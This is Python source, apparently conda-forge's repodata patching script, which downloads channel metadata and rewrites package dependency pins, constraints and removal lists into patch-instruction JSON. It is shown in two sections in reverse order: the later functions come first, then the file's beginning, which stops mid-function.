new_constrains.append("ld_impl_" + subdir + " <2.34")
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# we pushed a few builds of the compilers past the list of versions
# above which do not use the sysroot packages - this block catches those
# it will also break some test builds of the new compilers but we should
# not be using those anyways and they are marked as broken.
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"gcc_impl_" + subdir, "gxx_impl_" + subdir, "gfortran_impl_" + subdir]
and record['version'] not in ['5.4.0', '7.2.0', '7.3.0', '8.2.0']
and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
):
new_constrains = record.get('constrains', [])
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# all ctng activation packages that don't depend on the sysroot_*
# packages are not compatible with the new sysroot_*-based compilers
# root and cling must also be included as they have a builtin C++ interpreter
if (
subdir in ["linux-64", "linux-aarch64", "linux-ppc64le"]
and record_name in [
"gcc_" + subdir, "gxx_" + subdir, "gfortran_" + subdir,
"binutils_" + subdir, "gcc_bootstrap_" + subdir, "root_base", "cling"]
and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
):
new_constrains = record.get('constrains', [])
new_constrains.append("sysroot_" + subdir + " ==99999999999")
record["constrains"] = new_constrains
# old CDTs with the conda_cos6 or conda_cos7 name in the sysroot need to
# conflict with the new CDT and compiler packages
# all of the new CDTs and compilers depend on the sysroot_{subdir} packages
# so we use a constraint on those
if (
subdir == "noarch"
and (
record_name.endswith("-cos6-x86_64") or
record_name.endswith("-cos7-x86_64") or
record_name.endswith("-cos7-aarch64") or
record_name.endswith("-cos7-ppc64le")
)
and not record_name.startswith("sysroot-")
and not any(__r.startswith("sysroot_") for __r in record.get("depends", []))
):
if record_name.endswith("x86_64"):
sys_subdir = "linux-64"
elif record_name.endswith("aarch64"):
sys_subdir = "linux-aarch64"
elif record_name.endswith("ppc64le"):
sys_subdir = "linux-ppc64le"
new_constrains = record.get('constrains', [])
if not any(__r.startswith("sysroot_") for __r in new_constrains):
new_constrains.append("sysroot_" + sys_subdir + " ==99999999999")
record["constrains"] = new_constrains
# make sure pybind11 and pybind11-global have run constraints on
# the abi metapackage
# see https://github.com/conda-forge/conda-forge-repodata-patches-feedstock/issues/104 # noqa
if (
record_name in ["pybind11", "pybind11-global"]
# this version has a constraint sometimes
and (
pkg_resources.parse_version(record["version"])
<= pkg_resources.parse_version("2.6.1")
)
and not any(
c.startswith("pybind11-abi ")
for c in record.get("constrains", [])
)
):
_add_pybind11_abi_constraint(fn, record)
# add *lal>=7.1.1 as run_constrained for liblal-7.1.1
if (
record_name == "liblal"
and record['version'] == "7.1.1"
and record['build_number'] in (0, 1, 2, 100, 101, 102)
):
record.setdefault('constrains', []).extend((
"lal >=7.1.1",
"python-lal >=7.1.1",
))
return index
def _add_pybind11_abi_constraint(fn, record):
"""the pybind11-abi package uses the internals version
here are the ranges
v2.2.0 1
v2.2.1 1
v2.2.2 1
v2.2.3 1
v2.2.4 2
v2.3.0 3
v2.4.0 3
v2.4.1 3
v2.4.2 3
v2.4.3 3
v2.5.0 4
v2.6.0 4
v2.6.0b1 4
v2.6.0rc1 4
v2.6.0rc2 4
v2.6.0rc3 4
v2.6.1 4
prior to 2.2.0 we set it to 0
"""
ver = pkg_resources.parse_version(record["version"])
if ver < pkg_resources.parse_version("2.2.0"):
abi_ver = "0"
elif ver < pkg_resources.parse_version("2.2.4"):
abi_ver = "1"
elif ver < pkg_resources.parse_version("2.3.0"):
abi_ver = "2"
elif ver < pkg_resources.parse_version("2.5.0"):
abi_ver = "3"
elif ver <= pkg_resources.parse_version("2.6.1"):
abi_ver = "4"
else:
# past this we should have a constrains there already
raise RuntimeError(
"pybind11 version %s out of range for abi" % record["version"]
)
constrains = record.get("constrains", [])
found_idx = None
for idx in range(len(constrains)):
if constrains[idx].startswith("pybind11-abi "):
found_idx = idx
if found_idx is None:
constrains.append("pybind11-abi ==" + abi_ver)
else:
constrains[found_idx] = "pybind11-abi ==" + abi_ver
record["constrains"] = constrains
def _replace_pin(old_pin, new_pin, deps, record):
"""Replace an exact pin with a new one."""
if old_pin in deps:
i = record['depends'].index(old_pin)
record['depends'][i] = new_pin
def _rename_dependency(fn, record, old_name, new_name):
depends = record["depends"]
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == old_name),
None
)
if dep_idx is not None:
parts = depends[dep_idx].split(" ")
remainder = (" " + " ".join(parts[1:])) if len(parts) > 1 else ""
depends[dep_idx] = new_name + remainder
record['depends'] = depends
def _fix_libgfortran(fn, record):
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == "libgfortran"),
None
)
if dep_idx is not None:
# make sure respect minimum versions still there
# 'libgfortran' -> >=3.0.1,<4.0.0.a0
# 'libgfortran ==3.0.1' -> ==3.0.1
# 'libgfortran >=3.0' -> >=3.0,<4.0.0.a0
# 'libgfortran >=3.0.1' -> >=3.0.1,<4.0.0.a0
if ("==" in depends[dep_idx]) or ("<" in depends[dep_idx]):
pass
elif depends[dep_idx] == "libgfortran":
depends[dep_idx] = "libgfortran >=3.0.1,<4.0.0.a0"
record['depends'] = depends
elif ">=3.0.1" in depends[dep_idx]:
depends[dep_idx] = "libgfortran >=3.0.1,<4.0.0.a0"
record['depends'] = depends
elif ">=3.0" in depends[dep_idx]:
depends[dep_idx] = "libgfortran >=3.0,<4.0.0.a0"
record['depends'] = depends
elif ">=4" in depends[dep_idx]:
# catches all of 4.*
depends[dep_idx] = "libgfortran >=4.0.0,<5.0.0.a0"
record['depends'] = depends
def _set_osx_virt_min(fn, record, min_vers):
rconst = record.get("constrains", ())
dep_idx = next(
(q for q, dep in enumerate(rconst)
if dep.split(' ')[0] == "__osx"),
None
)
run_constrained = list(rconst)
if dep_idx is None:
run_constrained.append("__osx >=%s" % min_vers)
if run_constrained:
record['constrains'] = run_constrained
def _fix_libcxx(fn, record):
record_name = record["name"]
if not record_name in ["cctools", "ld64", "llvm-lto-tapi"]:
return
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == "libcxx"),
None
)
if dep_idx is not None:
dep_parts = depends[dep_idx].split(" ")
if len(dep_parts) >= 2 and dep_parts[1] == "4.0.1":
# catches all of 4.*
depends[dep_idx] = "libcxx >=4.0.1"
record['depends'] = depends
def pad_list(l, num):
if len(l) >= num:
return l
return l + ["0"]*(num - len(l))
def get_upper_bound(version, max_pin):
num_x = max_pin.count("x")
ver = pad_list(version.split("."), num_x)
ver[num_x:] = ["0"]*(len(ver)-num_x)
ver[num_x-1] = str(int(ver[num_x-1])+1)
return ".".join(ver)
def _relax_exact(fn, record, fix_dep, max_pin=None):
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if dep.split(' ')[0] == fix_dep),
None
)
if dep_idx is not None:
dep_parts = depends[dep_idx].split(" ")
if (len(dep_parts) == 3 and \
not any(dep_parts[1].startswith(op) for op in OPERATORS)):
if max_pin is not None:
upper_bound = get_upper_bound(dep_parts[1], max_pin) + "a0"
depends[dep_idx] = "{} >={},<{}".format(*dep_parts[:2], upper_bound)
else:
depends[dep_idx] = "{} >={}".format(*dep_parts[:2])
record['depends'] = depends
def _match_strict_libssh2_1_x_pin(dep):
if dep.startswith("libssh2 >=1.8.0,<1.9.0a0"):
return True
if dep.startswith("libssh2 >=1.8.1,<1.9.0a0"):
return True
if dep.startswith("libssh2 >=1.8.2,<1.9.0a0"):
return True
if dep.startswith("libssh2 1.8.*"):
return True
return False
def _relax_libssh2_1_x_pinning(fn, record):
depends = record.get("depends", ())
dep_idx = next(
(q for q, dep in enumerate(depends)
if _match_strict_libssh2_1_x_pin(dep)),
None
)
if dep_idx is not None:
depends[dep_idx] = "libssh2 >=1.8.0,<2.0.0a0"
cb_pin_regex = re.compile(r"^>=(?P<lower>\d(\.\d+)*a?),<(?P<upper>\d(\.\d+)*)a0$")
def _pin_stricter(fn, record, fix_dep, max_pin):
depends = record.get("depends", ())
dep_indices = [q for q, dep in enumerate(depends) if dep.split(' ')[0] == fix_dep]
for dep_idx in dep_indices:
dep_parts = depends[dep_idx].split(" ")
if len(dep_parts) not in [2, 3]:
continue
m = cb_pin_regex.match(dep_parts[1])
if m is None:
continue
lower = m.group("lower")
upper = m.group("upper").split(".")
new_upper = get_upper_bound(lower, max_pin).split(".")
upper = pad_list(upper, len(new_upper))
new_upper = pad_list(new_upper, len(upper))
if tuple(upper) > tuple(new_upper):
if str(new_upper[-1]) != "0":
new_upper += ["0"]
depends[dep_idx] = "{} >={},<{}a0".format(dep_parts[0], lower, ".".join(new_upper))
if len(dep_parts) == 3:
depends[dep_idx] = "{} {}".format(depends[dep_idx], dep_parts[2])
record['depends'] = depends
def _pin_looser(fn, record, fix_dep, max_pin=None, upper_bound=None):
depends = record.get("depends", ())
dep_indices = [q for q, dep in enumerate(depends) if dep.split(' ')[0] == fix_dep]
for dep_idx in dep_indices:
dep_parts = depends[dep_idx].split(" ")
if len(dep_parts) not in [2, 3]:
continue
m = cb_pin_regex.match(dep_parts[1])
if m is None:
continue
lower = m.group("lower")
upper = m.group("upper").split(".")
if upper_bound is None:
new_upper = get_upper_bound(lower, max_pin).split(".")
else:
new_upper = upper_bound.split(".")
upper = pad_list(upper, len(new_upper))
new_upper = pad_list(new_upper, len(upper))
if tuple(upper) < tuple(new_upper):
if str(new_upper[-1]) != "0":
new_upper += ["0"]
depends[dep_idx] = "{} >={},<{}a0".format(dep_parts[0], lower, ".".join(new_upper))
if len(dep_parts) == 3:
depends[dep_idx] = "{} {}".format(depends[dep_idx], dep_parts[2])
record['depends'] = depends
def _extract_and_remove_vc_feature(record):
features = record.get('features', '').split()
vc_features = tuple(f for f in features if f.startswith('vc'))
if not vc_features:
return None
non_vc_features = tuple(f for f in features if f not in vc_features)
vc_version = int(vc_features[0][2:]) # throw away all but the first
if non_vc_features:
record['features'] = ' '.join(non_vc_features)
else:
record['features'] = None
return vc_version
def _extract_feature(record, feature_name):
features = record.get('features', '').split()
features.remove(feature_name)
return " ".join(features) or None
def _extract_track_feature(record, feature_name):
features = record.get('track_features', '').split()
features.remove(feature_name)
return " ".join(features) or None
def main():
# Step 1. Collect initial repodata for all subdirs.
repodatas = {}
if "CF_SUBDIR" in os.environ:
# For local debugging
subdirs = os.environ["CF_SUBDIR"].split(";")
else:
subdirs = SUBDIRS
for subdir in tqdm.tqdm(subdirs, desc="Downloading repodata"):
repodata_url = "/".join(
(CHANNEL_ALIAS, CHANNEL_NAME, subdir, "repodata_from_packages.json"))
response = requests.get(repodata_url)
response.raise_for_status()
repodatas[subdir] = response.json()
# Step 2. Create all patch instructions.
prefix_dir = os.getenv("PREFIX", "tmp")
for subdir in subdirs:
prefix_subdir = join(prefix_dir, subdir)
if not isdir(prefix_subdir):
os.makedirs(prefix_subdir)
# Step 2a. Generate a new index.
new_index = _gen_new_index(repodatas[subdir], subdir)
# Step 2b. Generate the instructions by diff'ing the indices.
instructions = _gen_patch_instructions(
repodatas[subdir]['packages'], new_index, subdir)
# Step 2c. Output this to $PREFIX so that we bundle the JSON files.
patch_instructions_path = join(
prefix_subdir, "patch_instructions.json")
with open(patch_instructions_path, 'w') as fh:
json.dump(
instructions, fh, indent=2,
sort_keys=True, separators=(',', ': '))
if __name__ == "__main__":
sys.exit(main())
| # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from collections import defaultdict
import copy
import json
import os
from os.path import join, isdir
import sys
import tqdm
import re
import requests
import pkg_resources
from get_license_family import get_license_family
CHANNEL_NAME = "conda-forge"
CHANNEL_ALIAS = "https://conda.anaconda.org"
SUBDIRS = (
"noarch",
"linux-64",
"linux-armv7l",
"linux-aarch64",
"linux-ppc64le",
"osx-64",
"osx-arm64",
"win-32",
"win-64",
)
REMOVALS = {
"noarch": (
"sendgrid-5.3.0-py_0.tar.bz2",
),
"linux-64": (
"airflow-with-gcp_api-1.9.0-1.tar.bz2",
"airflow-with-gcp_api-1.9.0-2.tar.bz2",
"airflow-with-gcp_api-1.9.0-3.tar.bz2",
"adios-1.13.1-py36hbecc8f4_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"compliance-checker-2.2.0-0.tar.bz2",
"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"gdk-pixbuf-2.36.9-0.tar.bz2",
"itk-4.12.0-py27_0.tar.bz2",
"itk-4.12.0-py35_0.tar.bz2",
"itk-4.12.0-py36_0.tar.bz2",
"itk-4.13.0-py27_0.tar.bz2",
"itk-4.13.0-py35_0.tar.bz2",
"itk-4.13.0-py36_0.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_1.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_1.tar.bz2",
"libtasn1-4.13-py36_0.tar.bz2",
"libgsasl-1.8.0-py36_1.tar.bz2",
"nipype-0.12.0-0.tar.bz2",
"nipype-0.12.0-py35_0.tar.bz2",
"postgis-2.4.3+9.6.8-0.tar.bz2",
"pyarrow-0.1.post-0.tar.bz2",
"pyarrow-0.1.post-1.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
"pytest-regressions-1.0.1-0.tar.bz2",
"rapidpy-2.5.2-py36_0.tar.bz2",
"smesh-8.3.0b0-1.tar.bz2",
"statuspage-0.3.3-0.tar.bz2",
"statuspage-0.4.0-0.tar.bz2",
"statuspage-0.4.1-0.tar.bz2",
"statuspage-0.5.0-0.tar.bz2",
"statuspage-0.5.1-0.tar.bz2",
"tokenize-rt-2.0.1-py27_0.tar.bz2",
"vaex-core-0.4.0-py27_0.tar.bz2",
),
"osx-64": (
"adios-1.13.1-py36hbecc8f4_0.tar.bz2",
"airflow-with-gcp_api-1.9.0-1.tar.bz2",
"airflow-with-gcp_api-1.9.0-2.tar.bz2",
"arpack-3.6.1-blas_openblash1f444ea_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"compliance-checker-2.2.0-0.tar.bz2",
"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_1.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_1.tar.bz2",
"flask-rest-orm-0.5.0-py35_0.tar.bz2",
"flask-rest-orm-0.5.0-py36_0.tar.bz2",
"itk-4.12.0-py27_0.tar.bz2",
"itk-4.12.0-py35_0.tar.bz2",
"itk-4.12.0-py36_0.tar.bz2",
"itk-4.13.0-py27_0.tar.bz2",
"itk-4.13.0-py35_0.tar.bz2",
"itk-4.13.0-py36_0.tar.bz2",
"lammps-2018.03.16-.tar.bz2",
"libtasn1-4.13-py36_0.tar.bz2",
"mpb-1.6.2-1.tar.bz2",
"nipype-0.12.0-0.tar.bz2",
"nipype-0.12.0-py35_0.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
"pytest-regressions-1.0.1-0.tar.bz2",
"reentry-1.1.0-py27_0.tar.bz2",
"resampy-0.2.0-py27_0.tar.bz2",
"statuspage-0.3.3-0.tar.bz2",
"statuspage-0.4.0-0.tar.bz2",
"statuspage-0.4.1-0.tar.bz2",
"statuspage-0.5.0-0.tar.bz2",
"statuspage-0.5.1-0.tar.bz2",
"sundials-3.1.0-blas_openblash0edd121_202.tar.bz2",
"vlfeat-0.9.20-h470a237_2.tar.bz2",
"xtensor-python-0.19.1-h3e44d54_0.tar.bz2",
),
"osx-arm64": (
),
"win-32": (
"compliance-checker-2.2.0-0.tar.bz2",
"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"glpk-4.59-py27_vc9_0.tar.bz2",
"glpk-4.59-py34_vc10_0.tar.bz2",
"glpk-4.59-py35_vc14_0.tar.bz2",
"glpk-4.60-py27_vc9_0.tar.bz2",
"glpk-4.60-py34_vc10_0.tar.bz2",
"glpk-4.60-py35_vc14_0.tar.bz2",
"glpk-4.61-py27_vc9_0.tar.bz2",
"glpk-4.61-py35_vc14_0.tar.bz2",
"glpk-4.61-py36_0.tar.bz2",
"libspatialindex-1.8.5-py27_0.tar.bz2",
"liknorm-1.3.7-py27_1.tar.bz2",
"liknorm-1.3.7-py35_1.tar.bz2",
"liknorm-1.3.7-py36_1.tar.bz2",
"nlopt-2.4.2-0.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
),
"win-64": (
"compliance-checker-2.2.0-0.tar.bz2",
"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"glpk-4.59-py27_vc9_0.tar.bz2",
"glpk-4.59-py34_vc10_0.tar.bz2",
"glpk-4.59-py35_vc14_0.tar.bz2",
"glpk-4.60-py27_vc9_0.tar.bz2",
"glpk-4.60-py34_vc10_0.tar.bz2",
"glpk-4.60-py35_vc14_0.tar.bz2",
"glpk-4.61-py27_vc9_0.tar.bz2",
"glpk-4.61-py35_vc14_0.tar.bz2",
"glpk-4.61-py36_0.tar.bz2",
"itk-4.13.0-py35_0.tar.bz2",
"libspatialindex-1.8.5-py27_0.tar.bz2",
"liknorm-1.3.7-py27_1.tar.bz2",
"liknorm-1.3.7-py35_1.tar.bz2",
"liknorm-1.3.7-py36_1.tar.bz2",
"nlopt-2.4.2-0.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
"pytest-regressions-1.0.1-0.tar.bz2",
),
}
OPERATORS = ["==", ">=", "<=", ">", "<", "!="]
OSX_SDK_FIXES = {
'nodejs-12.8.0-hec2bf70_1': '10.10',
'nodejs-12.1.0-h6de7cb9_1': '10.10',
'nodejs-12.3.1-h6de7cb9_0': '10.10',
'nodejs-12.9.0-hec2bf70_0': '10.10',
'nodejs-12.9.1-hec2bf70_0': '10.10',
'nodejs-12.7.0-hec2bf70_1': '10.10',
'nodejs-12.10.0-hec2bf70_0': '10.10',
'nodejs-12.4.0-h6de7cb9_0': '10.10',
'nodejs-12.11.1-hec2bf70_0': '10.10',
'nodejs-12.7.0-h6de7cb9_0': '10.10',
'nodejs-12.3.0-h6de7cb9_0': '10.10',
'nodejs-10.16.3-hec2bf70_0': '10.10',
'nodejs-12.12.0-hfddbe92_0': '10.10',
'nodejs-12.8.1-hec2bf70_0': '10.10',
'javafx-sdk-11.0.4-h6dcaf97_1': '10.11',
'javafx-sdk-12.0.2-h6dcaf97_1': '10.11',
'javafx-sdk-12.0.2-h6dcaf97_0': '10.11',
'javafx-sdk-11.0.4-h6dcaf97_0': '10.11',
'qt-5.12.1-h1b46049_0': '10.12',
'qt-5.9.7-h8cf7e54_3': '10.12',
'qt-5.9.7-h93ee506_0': '10.12',
'qt-5.9.7-h93ee506_1': '10.12',
'qt-5.12.5-h1b46049_0': '10.12',
'qt-5.9.7-h93ee506_2': '10.12',
'openmpi-mpicxx-4.0.1-h6052eea_2': '10.12',
'openmpi-mpicxx-4.0.1-h6052eea_1': '10.12',
'openmpi-mpicxx-4.0.1-h6052eea_0': '10.12',
'openmpi-mpicxx-4.0.1-hc9558a2_2': '10.12',
'openmpi-mpicxx-4.0.1-hc9558a2_0': '10.12',
'openmpi-mpicxx-4.0.1-hc9558a2_1': '10.12',
'freecad-0.18.3-py37h4764a83_2': '10.12',
'freecad-0.18.3-py37hc453731_1': '10.12',
'freecad-0.18.4-py37hab2b3aa_1': '10.12',
'freecad-0.18.4-py37hab2b3aa_0': '10.12',
'openmpi-mpicc-4.0.1-h24e1f75_1': '10.12',
'openmpi-mpicc-4.0.1-h24e1f75_2': '10.12',
'openmpi-mpicc-4.0.1-h24e1f75_0': '10.12',
'openmpi-mpicc-4.0.1-h516909a_0': '10.12',
'openmpi-mpicc-4.0.1-h516909a_1': '10.12',
'openmpi-mpicc-4.0.1-h516909a_2': '10.12',
'openmpi-mpifort-4.0.1-h939af09_0': '10.12',
'openmpi-mpifort-4.0.1-h6ad152f_2': '10.12',
'openmpi-mpifort-4.0.1-h939af09_2': '10.12',
'openmpi-mpifort-4.0.1-h939af09_1': '10.12',
'openmpi-mpifort-4.0.1-he991be0_0': '10.12',
'openmpi-mpifort-4.0.1-he991be0_1': '10.12',
'openmpi-mpifort-4.0.1-he991be0_2': '10.12',
'reaktoro-1.0.7-py37h99eb986_0': '10.12',
'reaktoro-1.0.7-py37h99eb986_1': '10.12',
'reaktoro-1.0.7-py36h99eb986_0': '10.12',
'reaktoro-1.0.7-py36h99eb986_1': '10.12',
'pyqt-5.12.3-py38he22c54c_1': '10.12',
'pyqt-5.9.2-py37h2a560b1_0': '10.12',
'pyqt-5.12.3-py36he22c54c_1': '10.12',
'pyqt-5.9.2-py27h2a560b1_4': '10.12',
'pyqt-5.9.2-py27h2a560b1_1': '10.12',
'pyqt-5.9.2-py37h2a560b1_4': '10.12',
'pyqt-5.9.2-py36h2a560b1_3': '10.12',
'pyqt-5.9.2-py27h2a560b1_2': '10.12',
'pyqt-5.9.2-py36h2a560b1_1': '10.12',
'pyqt-5.12.3-py27h2a560b1_0': '10.12',
'pyqt-5.12.3-py37h2a560b1_0': '10.12',
'pyqt-5.12.3-py27he22c54c_0': '10.12',
'pyqt-5.12.3-py27he22c54c_1': '10.12',
'pyqt-5.9.2-py37h2a560b1_2': '10.12',
'pyqt-5.9.2-py37h2a560b1_1': '10.12',
'pyqt-5.9.2-py36h2a560b1_0': '10.12',
'pyqt-5.9.2-py36h2a560b1_4': '10.12',
'pyqt-5.9.2-py27h2a560b1_0': '10.12',
'pyqt-5.9.2-py37h2a560b1_3': '10.12',
'pyqt-5.12.3-py38he22c54c_0': '10.12',
'pyqt-5.9.2-py27h2a560b1_3': '10.12',
'pyqt-5.9.2-py36h2a560b1_2': '10.12',
'pyqt-5.12.3-py37he22c54c_0': '10.12',
'pyqt-5.12.3-py36he22c54c_0': '10.12',
'pyqt-5.12.3-py37he22c54c_1': '10.12',
'pyqt-5.12.3-py36h2a560b1_0': '10.12',
'ldas-tools-al-2.6.3-hf543496_0': '10.12',
'ldas-tools-al-2.6.3-hf543496_1': '10.12',
'ldas-tools-al-2.6.4-h4f290e7_1': '10.12',
'ldas-tools-al-2.6.4-h4f290e7_0': '10.12',
'openmpi-4.0.1-ha90c164_2': '10.12',
'openmpi-4.0.1-ha90c164_0': '10.12',
'openmpi-4.0.1-hfcebdee_2': '10.12',
'openmpi-4.0.1-ha90c164_1': '10.12',
'openmpi-4.0.1-hc99cbb1_1': '10.12',
'openmpi-4.0.1-hc99cbb1_0': '10.12',
'openmpi-4.0.1-hc99cbb1_2': '10.12',
}
def _add_removals(instructions, subdir):
r = requests.get(
"https://conda.anaconda.org/conda-forge/"
"label/broken/%s/repodata.json" % subdir
)
if r.status_code != 200:
r.raise_for_status()
data = r.json()
currvals = list(REMOVALS.get(subdir, []))
for pkg_name in data["packages"]:
currvals.append(pkg_name)
instructions["remove"].extend(tuple(set(currvals)))
def _gen_patch_instructions(index, new_index, subdir):
instructions = {
"patch_instructions_version": 1,
"packages": defaultdict(dict),
"revoke": [],
"remove": [],
}
_add_removals(instructions, subdir)
# diff all items in the index and put any differences in the instructions
for fn in index:
assert fn in new_index
# replace any old keys
for key in index[fn]:
assert key in new_index[fn], (key, index[fn], new_index[fn])
if index[fn][key] != new_index[fn][key]:
instructions['packages'][fn][key] = new_index[fn][key]
# add any new keys
for key in new_index[fn]:
if key not in index[fn]:
instructions['packages'][fn][key] = new_index[fn][key]
return instructions
def has_dep(record, name):
return any(dep.split(' ')[0] == name for dep in record.get('depends', ()))
def get_python_abi(version, subdir, build=None):
if build is not None:
m = re.match(".*py\d\d", build)
if m:
version = f"{m.group()[-2]}.{m.group()[-1]}"
if version.startswith("2.7"):
if subdir.startswith("linux"):
return "cp27mu"
return "cp27m"
elif version.startswith("2.6"):
if subdir.startswith("linux"):
return "cp26mu"
return "cp26m"
elif version.startswith("3.4"):
return "cp34m"
elif version.startswith("3.5"):
return "cp35m"
elif version.startswith("3.6"):
return "cp36m"
elif version.startswith("3.7"):
return "cp37m"
elif version.startswith("3.8"):
return "cp38"
elif version.startswith("3.9"):
return "cp39"
return None
# Workaround for https://github.com/conda/conda-build/pull/3868
def remove_python_abi(record):
if record['name'] in ['python', 'python_abi', 'pypy']:
return
if not has_dep(record, 'python_abi'):
return
depends = record.get('depends', [])
record['depends'] = [dep for dep in depends if dep.split(" ")[0] != "python_abi"]
changes = set([])
def add_python_abi(record, subdir):
record_name = record['name']
# Make existing python and python-dependent packages conflict with pypy
if record_name == "python" and not record['build'].endswith("pypy"):
version = record['version']
new_constrains = record.get('constrains', [])
python_abi = get_python_abi(version, subdir)
new_constrains.append(f"python_abi * *_{python_abi}")
record['constrains'] = new_constrains
return
if has_dep(record, 'python') and not has_dep(record, 'pypy') and not has_dep(record, 'python_abi'):
python_abi = None
new_constrains = record.get('constrains', [])
build = record["build"]
ver_strict_found = False
ver_relax_found = False
for dep in record.get('depends', []):
dep_split = dep.split(' ')
if dep_split[0] == 'python':
if len(dep_split) == 3:
continue
if len(dep_split) == 1:
continue
elif dep_split[1] == "<3":
python_abi = get_python_abi("2.7", subdir, build)
elif dep_split[1].startswith(">="):
m = cb_pin_regex.match(dep_split[1])
if m == None:
python_abi = get_python_abi("", subdir, build)
else:
lower = pad_list(m.group("lower").split("."), 2)[:2]
upper = pad_list(m.group("upper").split("."), 2)[:2]
if lower[0] == upper[0] and int(lower[1]) + 1 == int(upper[1]):
python_abi = get_python_abi(m.group("lower"), subdir, build)
else:
python_abi = get_python_abi("", subdir, build)
else:
python_abi = get_python_abi(dep_split[1], subdir, build)
if python_abi:
new_constrains.append(f"python_abi * *_{python_abi}")
changes.add((dep, f"python_abi * *_{python_abi}"))
ver_strict_found = True
else:
ver_relax_found = True
if not ver_strict_found and ver_relax_found:
new_constrains.append("pypy <0a0")
record['constrains'] = new_constrains
def _gen_new_index(repodata, subdir):
"""Make any changes to the index by adjusting the values directly.
This function returns the new index with the adjustments.
Finally, the new and old indices are then diff'ed to produce the repo
data patches.
"""
index = copy.deepcopy(repodata["packages"])
# deal with windows vc features
if subdir.startswith("win-"):
python_vc_deps = {
'2.6': 'vc 9.*',
'2.7': 'vc 9.*',
'3.3': 'vc 10.*',
'3.4': 'vc 10.*',
'3.5': 'vc 14.*',
'3.6': 'vc 14.*',
'3.7': 'vc 14.*',
}
for fn, record in index.items():
record_name = record['name']
if record_name == 'python':
# remove the track_features key
if 'track_features' in record:
record['track_features'] = None
# add a vc dependency
if not any(d.startswith('vc') for d in record['depends']):
depends = record['depends']
depends.append(python_vc_deps[record['version'][:3]])
record['depends'] = depends
elif 'vc' in record.get('features', ''):
# remove vc from the features key
vc_version = _extract_and_remove_vc_feature(record)
if vc_version:
# add a vc dependency
if not any(d.startswith('vc') for d in record['depends']):
depends = record['depends']
depends.append('vc %d.*' % vc_version)
record['depends'] = depends
proj4_fixes = {"cartopy", "cdo", "gdal", "libspatialite", "pynio", "qgis"}
for fn, record in index.items():
record_name = record["name"]
if record.get('timestamp', 0) < 1604417730000:
if subdir == 'noarch':
remove_python_abi(record)
else:
add_python_abi(record, subdir)
if "license" in record and "license_family" not in record and record["license"]:
family = get_license_family(record["license"])
if family:
record['license_family'] = family
# remove dependency from constrains for twisted
if record_name == "twisted":
new_constrains = [dep for dep in record.get('constrains', ())
if not dep.startswith("pyobjc-framework-cococa")]
if new_constrains != record.get('constrains', ()):
record['constrains'] = new_constrains
if record_name == "starlette-base":
if not any(dep.split(' ')[0] == "starlette" for dep in record.get('constrains', ())):
if 'constrains' in record:
record['constrains'].append(f"starlette {record['version']}")
else:
record['constrains'] = [f"starlette {record['version']}"]
if record_name == "pytorch" and record.get('timestamp', 0) < 1610297816658:
# https://github.com/conda-forge/pytorch-cpu-feedstock/issues/29
if not any(dep.split(' ')[0] == 'typing_extensions'
for dep in record.get('depends', ())):
if 'depends' in record:
